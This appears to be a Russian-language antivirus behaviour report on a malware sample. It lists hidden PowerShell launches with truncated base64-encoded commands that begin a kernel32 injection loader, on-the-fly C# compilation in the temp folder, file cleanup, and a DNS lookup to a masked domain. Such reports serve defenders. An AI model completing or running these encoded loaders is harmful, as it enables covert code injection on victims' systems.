Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -window hidden -e JAByAE0AOABSACAAPQAgACcAJABCAFAASQBLACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\4oimrt1e.0.cs
- %TEMP%\4oimrt1e.cmdline
- %TEMP%\4oimrt1e.out
- %TEMP%\csccd8b.tmp
- %TEMP%\rescd9c.tmp
- %TEMP%\4oimrt1e.dll
Удаляет следующие файлы
- %TEMP%\rescd9c.tmp
- %TEMP%\csccd8b.tmp
- %TEMP%\4oimrt1e.0.cs
- %TEMP%\4oimrt1e.out
- %TEMP%\4oimrt1e.cmdline
- %TEMP%\4oimrt1e.dll
- %TEMP%\4oimrt1e.pdb
Сетевая активность
UDP
- DNS ASK sk##e.pro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -window hidden -e JAByAE0AOABSACAAPQAgACcAJABCAFAASQBLACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\4oimrt1e.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCD9C.tmp" "%TEMP%\CSCCD8B.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e JABCAFAASQBLACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAE...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\4oimrt1e.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCD9C.tmp" "%TEMP%\CSCCD8B.tmp"
